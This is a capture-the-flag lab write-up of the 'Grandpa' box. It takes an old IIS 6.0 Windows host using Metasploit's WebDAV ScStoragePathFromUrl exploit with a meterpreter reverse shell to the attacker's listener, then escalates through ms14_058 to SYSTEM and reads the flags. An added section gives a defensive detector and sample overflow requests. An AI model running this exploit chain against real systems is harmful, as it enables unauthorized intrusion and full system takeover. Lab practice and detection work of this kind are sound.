
Grandpa practice notes

☕ 4 min read · ✍️ IceKam

Environment:

Name: Grandpa

OS: Windows

Information gathering

Identifying the target

$ nmap -sV -O -F -oA Grandpa --version-light 10.10.10.14     
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-29 09:19 CST
Nmap scan report for 10.10.10.14
Host is up (0.34s latency).
Not shown: 99 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP (92%)
  • From this we can see IIS 6.0 on port 80, and the system is Windows XP.

Port 80

$ nmap -p 80 --script vuln 10.10.10.14               
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-29 09:20 CST
[1]    2261 segmentation fault  nmap -p 80 --script vuln 10.10.10.14
  • Naturally the first thing to check is the high-risk ports, but nothing turned up.

Grandpa

  • Nothing on the web side either.

Getting a shell

Vulnerability enumeration

$ searchsploit IIS 6.0  
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal I | exploits/windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Wind | exploits/windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Sta | exploits/windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Re | exploits/windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow | exploits/windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStorageP | exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8754.patch
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8806.pl
Microsoft IIS 6.0/7.5 (+ PHP) - Multip | exploits/windows/remote/19033.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
  • Found a remote code execution one: ScStorageP (ScStoragePathFromUrl).

Searching for the exploit

msf5 > search ScStorageP

Matching Modules
================

   ##  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes     Microsoft IIS WebDav ScStoragePathFromUrl Overflow
  • Usable.

Loading the exploit

msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl

Configuring the exploit

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.14
RHOSTS => 10.10.10.14
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options 


msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.16
LHOST => 10.10.14.16
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
[*] Started reverse TCP handler on 10.10.14.16:4444 
  • Note that the VPN can cause the reverse connection to hang, so the local IP has to be set manually.
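As an added defender-side example that is not part of the original post: the WebDAV module used above delivers its overflow through a PROPFIND request whose If header carries abnormally long tagged-list URIs, so a small check on raw requests can surface that shape. The sample requests and the 256-byte threshold are constructed for this example.

```python
import re

# Constructed sample requests (not captured from the original post): a normal
# WebDAV PROPFIND with a short lock-token list, a PROPFIND carrying an
# oversized If header of the kind the ScStoragePathFromUrl overflow needs,
# and a plain GET.
SAMPLE_REQUESTS = [
    "PROPFIND /shared/ HTTP/1.1\r\nHost: 10.10.10.14\r\nDepth: 1\r\n"
    "If: <http://10.10.10.14/shared/> (<locktoken:write1>)\r\n\r\n",
    "PROPFIND / HTTP/1.1\r\nHost: 10.10.10.14\r\n"
    "If: <http://10.10.10.14/" + "A" * 300 + "> (Not <locktoken:write1>) "
    "<http://10.10.10.14/" + "B" * 300 + ">\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: 10.10.10.14\r\n\r\n",
]

# Assumed threshold for this example: a legitimate If header holds a few short
# resource URIs and lock tokens, well under this size.
IF_HEADER_MAX_LEN = 256


def parse_request(raw):
    """Split a raw HTTP request into (method, path, {lowercased header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")   # first colon only; values may contain ':'
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_suspicious_webdav(raw):
    """Return a reason string when a PROPFIND looks like an overflow attempt, else None."""
    method, _path, headers = parse_request(raw)
    if method != "PROPFIND" or "if" not in headers:
        return None
    if_header = headers["if"]
    if len(if_header) > IF_HEADER_MAX_LEN:
        return "oversized If header (%d bytes)" % len(if_header)
    # More than two tagged URIs in one If header is unusual for real clients.
    if len(re.findall(r"<https?://", if_header)) > 2:
        return "unusual number of tagged-list URIs in If header"
    return None


def scan(requests):
    """Return (index, reason) for every request worth alerting on."""
    hits = []
    for i, raw in enumerate(requests):
        reason = is_suspicious_webdav(raw)
        if reason:
            hits.append((i, reason))
    return hits
```

The real mitigation for this host is the missing vendor patch and disabling WebDAV on IIS 6.0 where it is not needed; the check above only helps spot attempts in captured traffic.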

Privilege escalation

Backgrounding the session

meterpreter > background 
[*] Backgrounding session 2...

Local exploit enumeration

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > show options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > set SESSION 2 
SESSION => 2
msf5 post(multi/recon/local_exploit_suggester) > run
  • Just run local_exploit_suggester against the session.
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 29 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
  • Enumeration succeeded; ms14_058_track_popup_menu is usable.

Exploit search

msf5 post(multi/recon/local_exploit_suggester) > search ms14_058

Matching Modules
================

   ##  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  exploit/windows/local/ms14_058_track_popup_menu  2014-10-14       normal  Yes    Windows TrackPopupMenu Win32k NULL Pointer Dereference

Loading the exploit

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_058_track_popup_menu
msf5 exploit(windows/local/ms14_058_track_popup_menu) > show options 

Module options (exploit/windows/local/ms14_058_track_popup_menu):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf5 exploit(windows/local/ms14_058_track_popup_menu) > set SESSION 2 
SESSION => 2
msf5 exploit(windows/local/ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on 192.168.123.40:4444 
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
  • The exploit completed, but creating a new session failed.

Manual migration

msf5 exploit(windows/local/ms14_058_track_popup_menu) > sessions -i 2

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]                                                
 4     0     System                                                          
 180   1812  notepad.exe        x86   0                                      C:\WINDOWS\system32\notepad.exe
 272   4     smss.exe                                                        
 324   272   csrss.exe                                                       
 348   272   winlogon.exe                                                    
 396   348   services.exe                                                    
 408   348   lsass.exe                                                       
 588   396   svchost.exe                                                     
 680   396   svchost.exe                                                     
 736   396   svchost.exe                                                     
 764   396   svchost.exe                                                     
 800   396   svchost.exe                                                     
 936   396   spoolsv.exe                                                     
 964   396   msdtc.exe                                                       
 1084  396   cisvc.exe                                                       
 1124  396   svchost.exe                                                     
 1180  396   inetinfo.exe                                                    
 1216  396   svchost.exe                                                     
 1328  396   VGAuthService.exe                                               
 1408  396   vmtoolsd.exe                                                    
 1456  396   svchost.exe                                                     
 1596  396   svchost.exe                                                     
 1700  396   alg.exe                                                         
 1812  588   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1912  396   dllhost.exe                                                     
 1940  348   logon.scr                                                       
 2156  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2304  588   wmiprvse.exe                                                    
 3384  1456  w3wp.exe                                                        
 3540  588   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 3712  2156  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 3896  1084  cidaemon.exe                                                    
 3940  1084  cidaemon.exe                                                    
 3964  1084  cidaemon.exe 

meterpreter > migrate 1812
[*] Migrating from 3792 to 1812...
[*] Migration completed successfully.
  • Migrate into the wmiprvse.exe process.

Downloading the PoC

meterpreter > background 
[*] Backgrounding session 2...
msf5 exploit(windows/local/ms14_058_track_popup_menu) > show options 

Module options (exploit/windows/local/ms14_058_track_popup_menu):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  2                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.16      yes       The listen address (an interface may be specified)
   LPORT     4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf5 exploit(windows/local/ms14_058_track_popup_menu) > set lport 4444
lport => 4444
msf5 exploit(windows/local/ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on 10.10.14.16:4444 
[*] Launching notepad to host the exploit...
[+] Process 180 launched.
[*] Reflectively injecting the exploit DLL into 180...
[*] Injecting exploit into 180...
[*] Exploit injected. Injecting payload into 180...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (180291 bytes) to 10.10.10.14
[*] Meterpreter session 3 opened (10.10.14.16:4444 -> 10.10.10.14:1034) at 2019-10-29 09:39:38 +0800

meterpreter > shell
Process 568 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
nt authority\system
  • Running ms14_058 again yields the highest privileges.

flag

C:\WINDOWS\system32>cd ../../
cd ../../

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\

04/12/2017  04:27 PM    <DIR>          ADFS
04/12/2017  04:04 PM                 0 AUTOEXEC.BAT
04/12/2017  04:04 PM                 0 CONFIG.SYS
04/12/2017  04:32 PM    <DIR>          Documents and Settings
04/12/2017  04:17 PM    <DIR>          FPSE_search
04/12/2017  04:17 PM    <DIR>          Inetpub
12/24/2017  07:18 PM    <DIR>          Program Files
12/24/2017  07:27 PM    <DIR>          WINDOWS
04/12/2017  04:05 PM    <DIR>          wmpub
               2 File(s)              0 bytes
               7 Dir(s)  18,091,200,512 bytes free

C:\>cd Documents and Settings
cd Documents and Settings

C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings

04/12/2017  04:32 PM    <DIR>          .
04/12/2017  04:32 PM    <DIR>          ..
04/12/2017  04:12 PM    <DIR>          Administrator
04/12/2017  04:03 PM    <DIR>          All Users
04/12/2017  04:32 PM    <DIR>          Harry
               0 File(s)              0 bytes
               5 Dir(s)  18,091,196,416 bytes free

C:\Documents and Settings>cd Harry
cd Harry

C:\Documents and Settings\Harry>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings\Harry

04/12/2017  04:32 PM    <DIR>          .
04/12/2017  04:32 PM    <DIR>          ..
04/12/2017  04:32 PM    <DIR>          Desktop
04/12/2017  04:32 PM    <DIR>          Favorites
04/12/2017  04:32 PM    <DIR>          My Documents
04/12/2017  03:42 PM    <DIR>          Start Menu
04/12/2017  03:44 PM                 0 Sti_Trace.log
               1 File(s)              0 bytes
               6 Dir(s)  18,091,196,416 bytes free

C:\Documents and Settings\Harry>cd Desktop
cd Desktop

C:\Documents and Settings\Harry\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings\Harry\Desktop

04/12/2017  04:32 PM    <DIR>          .
04/12/2017  04:32 PM    <DIR>          ..
04/12/2017  04:32 PM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  18,091,196,416 bytes free

C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
bdff5ec67c3cff017f2bedc146a5d869
C:\Documents and Settings\Harry\Desktop>cd ../../
cd ../../

C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings

04/12/2017  04:32 PM    <DIR>          .
04/12/2017  04:32 PM    <DIR>          ..
04/12/2017  04:12 PM    <DIR>          Administrator
04/12/2017  04:03 PM    <DIR>          All Users
04/12/2017  04:32 PM    <DIR>          Harry
               0 File(s)              0 bytes
               5 Dir(s)  18,091,192,320 bytes free

C:\Documents and Settings>cd Administrator
cd Administrator

C:\Documents and Settings\Administrator>cd Desktop
cd Desktop

C:\Documents and Settings\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings\Administrator\Desktop

04/12/2017  04:28 PM    <DIR>          .
04/12/2017  04:28 PM    <DIR>          ..
04/12/2017  04:29 PM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  18,091,192,320 bytes free

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
9359e905a2c35f861f6a57cecf28bb7b

Takeaways

A classic MSF exploitation of vulnerabilities in an old Windows version.
